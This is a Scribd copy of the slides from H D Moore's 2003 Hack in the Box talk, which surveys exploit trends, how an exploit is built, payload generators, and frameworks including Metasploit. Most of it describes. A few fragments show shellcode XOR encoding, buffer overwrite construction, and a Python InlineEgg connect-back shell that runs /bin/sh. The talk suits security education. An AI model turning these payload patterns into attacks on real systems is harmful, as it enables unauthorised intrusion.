Scribd
Upload
462 views57 pages

Advanced Exploit Development

The document summarizes H D Moore's presentation on "Advanced Exploit Development Trends and Tools" given at Hack in the Box 2003. The presentation covered exploit trends like more exploit writers, improved techniques, and reliable exploit code. It discussed the anatomy of an exploit including components like payloads, encoders, and exploit requests. Common exploit problems and new payload generators and exploit frameworks were also overviewed, with the Metasploit Framework demonstrated.

Uploaded by

Pooja Khare
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
462 views57 pages

Advanced Exploit Development

The document summarizes H D Moore's presentation on "Advanced Exploit Development Trends and Tools" given at Hack in the Box 2003. The presentation covered exploit trends like more exploit writers, improved techniques, and reliable exploit code. It discussed the anatomy of an exploit including components like payloads, encoders, and exploit requests. Common exploit problems and new payload generators and exploit frameworks were also overviewed, with the Metasploit Framework demonstrated.

Uploaded by

Pooja Khare
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 57

Hack in the Box 2003

Advanced Exploit Development


Trends and Tools
H D Moore

Who

Who am I?
Co-founder of Digital Defense Security researcher (5+ years) Projects DigitalOffense.net Metasploit.com
2

What

What is this about?


1. Exploit Trends 2. Anatomy of an Exploit 3. Common Exploit Problems 4. Payload Generators 5. Exploit Frameworks 6. Metasploit v2.0 Demo!
3

Why

Why should you see this?


Exploit basics and challenges Recent trends and advances New shellcode generation tools Review of exploit frameworks Exclusive look at Metasploit v2.0
4

Hack in the Box 2003

Exploit Trends

#1: Exploit Trends

More Exploit Writers


Information reached critical mass Huge exploit devel community

Improved Techniques
No more local brute force 4 Bytes: GOT, SEH, PEB
6

#1: Exploit Trends

Reliable Exploit Code


Universal win32 addresses Allocation control techniques

Where Does This Lead?


Shrinking exploit timeline Exploit tools and frameworks
7

Hack in the Box 2003

Anatomy of an Exploit

#2: Anatomy of an Exploit

Exploit Components
Target and option selection Network and protocol code Payload or shellcode Payload encoding routine Exploit request builder Payload handler routine
9

#2: Anatomy of an Exploit

Target and option selection List of addresses and offsets Process user selected target Process other exploit options This adds up to a lot of code...

10

#2: Anatomy of an Exploit


Process Options
./exp -h 1.2.3.4 -p 21 -t 0

Parsing command options...

Target System IP: 1.2.3.4 OS: Linux

11

#2: Anatomy of an Exploit

Network and protocol code Resolve the target address Create the appropriate socket Connect the socket if needed Perform any error handling Start protocol negotiation
12

#2: Anatomy of an Exploit


Process Options Network Conn
gethostbyname(sockaddr) socket(AF_INET, ...); connect(s, &sockaddr, 16) ftp_login(s, user, pass); Connecting to target...

Target System IP: 1.2.3.4 OS: Linux

13

#2: Anatomy of an Exploit

Payload or shellcode Executes when exploit works Bindshell, Findsock, Adduser Normally written in assembly Stored in code as binary string Configuration done via offsets
14

#2: Anatomy of an Exploit


Process Options Network Conn Payload
shellcodes[0] = \xeb... scode = shellcodes[target] scode[PORT] = htons(...) Setting target...

Target System IP: 1.2.3.4 OS: Linux

15

#2: Anatomy of an Exploit

Payload encoding routine Most exploits restrict characters Encoder must filter these chars Standard type is XOR decode Often just pre-encode payload Payload options also encoded
16

#2: Anatomy of an Exploit


Process Options Network Conn Payload Payload Encoder
for(x=0;x<sizeof(scode);x++) scode[x]^= 0x99;

Encoding shellcode...

Target System IP: 1.2.3.4 OS: Linux

17

#2: Anatomy of an Exploit

Exploit request builder Code which triggers the vuln Ranges from simple to complex Can require various calculations Normally just string mangling Scripting languages excel at this
18

#2: Anatomy of an Exploit


Process Options Network Conn
Sending exploit request... buf= web_request(/cgi-bin... memcpy(buf+100, scode, ...); buf[480] = (char *) retaddr; send(s, buf, strlen(buf));

Payload Payload Encoder Exploit Request

Target System IP: 1.2.3.4 OS: Linux

Payload

19

#2: Anatomy of an Exploit

Payload handler routine Each payload needs a handler Often just connects to bindshell Reverse connect needs listener Connects console to socket Account for large chunk of code
20

#2: Anatomy of an Exploit


Process Options Network Conn Payload Payload Encoder Exploit Request Payload Handler Bind Shell Payload
b = socket(AF_INET, ...); connect(b, &sockaddr, 16); handle_shell(b) Dropping to shell... sh-2.04# id uid=0(root) gid=0(root)...

Target System IP: 1.2.3.4 OS: Linux

21

Hack in the Box 2003

Common Exploit Problems

22

#3: Common Exploit Problems

Exploit code is rushed Robust code takes time Coders race to be the first Old exploits are less useful Result: lots of broken code
23

#3: Common Exploit Problems

Exploiting Complex Protocols RPC, SSH, SSL, SMB Exploit depends on API Exploit supplied as patch Restricts exploit environment Requires old software archive
24

#3: Common Exploit Problems

Limited Target Sets


One-shot vulnerabilities suck Always limited testing resources Finding target values takes time

25

#3: Common Exploit Problems

Payload Issues
Most hardcode payloads Firewalls can block bind shells Custom config breaks exploit No standard payload library

26

Hack in the Box 2003

Payload Generators

27

#4: Payload Generators

Generator Basics
Dynamic payload creation Use a high-level language Useful for custom situations

28

#4: Payload Generators

Many Generator Projects


Only a few are usable Spawned from frameworks Impressive capabilities so far

29

#4: Payload Generators

Impurity (Alexander Cuttergo)


Shellcode downloads to memory Executable is staticly linked C Allows library functions No filesystem access required Supports Linux on x86
30

#4: Payload Generators

31

#4: Payload Generators

Shellforge (Philippe Biondi )


Transforms C to payload Uses GCC and python Includes helper API Simple and usable

32

#4: Payload Generators

Shellforge Example:
#include "include/sfsyscall.h" int main(void) { char buf[] = "Hello world!\n"; write(1, buf, sizeof(buf)); exit(0); }

33

#4: Payload Generators

MOSDEF (Immunity Inc)


GPL spawn of CANVAS Dynamic code via python API loader via import tags Compile, send, exec, return Version 0.1 not ready to use
34

#4: Payload Generators

MOSDEF Example:
#import "remote","Kernel32._lcreat" as "_lcreat" #import "string","filename" as "filename //start of code void main() { int i; i=_lcreat(filename); sendint(i,i); }

35

#4: Payload Generators

InlineEgg (CORE SDI)


Spawn of CORE Impact Dynamic code via python Non-commercial use only Supports Linux, BSD, Windows...

36

#4: Payload Generators

InlineEgg Example:
egg = InlineEgg(Linuxx86Syscall) # connect to other side sock = egg.socket(socket.AF_INET,socket.SOCK_STREAM) sock = egg.save(sock) egg.connect(sock,(connect_addr, connect_port)) # dup and exec egg.dup2(sock, 0) egg.dup2(sock, 1) egg.dup2(sock, 2) egg.execve('/bin/sh',('bash','-i'))

37

Hack in the Box 2003

Exploit Frameworks

38

#5: Exploit Frameworks

Framework Basics
Library of common routines Simple to add new payloads Minimize development time Platform for new techniques

39

#5: Exploit Frameworks

Public Exploit Frameworks


Two stable commercial products Handful of open source projects New projects in stealth mode

40

#5: Exploit Frameworks

CORE Impact (CORE SDI)


Strong product, 2+ years old Skilled development team Massive number of exploits Python and C++ (Windows) Starts at $15,000 USD
41

#5: Exploit Frameworks

CORE Impact (CORE SDI)


Stable syscall proxy system Full development platform Discovery and probe modules Macro function capabilities Integrated XML reporting
42

#5: Exploit Frameworks

43

#5: Exploit Frameworks

Windows ASM Components


Solid design, great features Includes skeleton and manager Full source code is available Written in C and ASM Modular development system
44

#5: Exploit Frameworks

Windows ASM Components


Small first stage component Installs payload over network Avoid bytes with XOR encoder Fork, Bind, Connect, Findsock

45

#5: Exploit Frameworks

46

#5: Exploit Frameworks

CANVAS (Immunity Inc)


New and gaining ground Small set of reliable exploits Includes non-public 0-day Supports Linux & Windows Priced at $995 USD
47

#5: Exploit Frameworks

CANVAS (Immunity Inc)


Working syscall proxy system Solid payload encoder system Includes API for developers Exploits Solaris, Linux, Windoze Automatic SQL injection module
48

#5: Exploit Frameworks

49

#5: Exploit Frameworks

LibExploit (Simon Femerling)


New project, improving quickly C library to simply development Includes two sample exploits Currently supports Linux x86 Released as open source (GPL)
50

#5: Exploit Frameworks

LibExploit (Simon Femerling)


Includes ~30 stock payloads Generate dynamic payloads Can encode with ADMutate Common networking API Built-in exploit console
51

#5: Exploit Frameworks

52

#5: Exploit Frameworks

Metasploit Exploit Framework


Complete exploit environment Small set of reliable exploits Trivial to use new payloads Handlers and callbacks Full source code (OSS)
53

#5: Exploit Frameworks

Metasploit Exploit Framework


Modular and extensible API Protocol modules and routines Easy to add new interfaces Designed to allow embedding Very active development
54

#5: Exploit Frameworks

55

Hack in the Box 2003

Questions?

56

Hack in the Box 2003

Metasploit Framework Demonstration

57

You might also like